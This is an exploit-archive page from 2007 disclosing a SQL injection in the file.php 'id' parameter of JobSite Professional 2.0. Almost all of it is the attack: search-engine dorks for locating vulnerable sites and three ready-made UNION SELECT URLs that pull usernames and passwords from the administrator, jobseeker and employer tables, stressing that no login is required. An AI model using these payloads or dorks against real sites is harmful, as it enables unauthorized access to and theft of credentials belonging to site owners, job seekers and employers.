JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability
# Published : 2007-10-28
# Author : ZynbER
# Previous Title : ProfileCMS 1.0 Remote File Upload Vulnerability Shell Upload Exploit
# Next Title : CaupoShop Pro 2.x (action) Remote File Inclusion Vulnerability

#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################


## AUTHOR : ZynbER
## HOME : NoWhere


## Script WebSite:
http://www.jobsiteprofessional.com

## Dork english version : inurl:index.php?page=en_jobseekers
## Dork french version  : inurl:index.php?page=fr_Candidats


## EXPLOITS :

Vulnerability in (File.php?id=)



http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_admin_users/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_jobseekers/*

http://website.com/file.php?id=-1+UNION+SELECT+1,2,PASSWORD,4,CONCAT(USERNAME,CHAR(46,116,120,116)),6,7,8+FROM+websiteadmin_ext_employers/*



## Note
No registration is needed!!



## GREETZ  :  MEKNES - SIDIBABA - MARROK - SKIZO - BouKa-BouKa

#########################################################################
JobSite Professional v2.0    Remote SQL Injection Vulnerability
#########################################################################

# www.Syue.com [2007-10-28]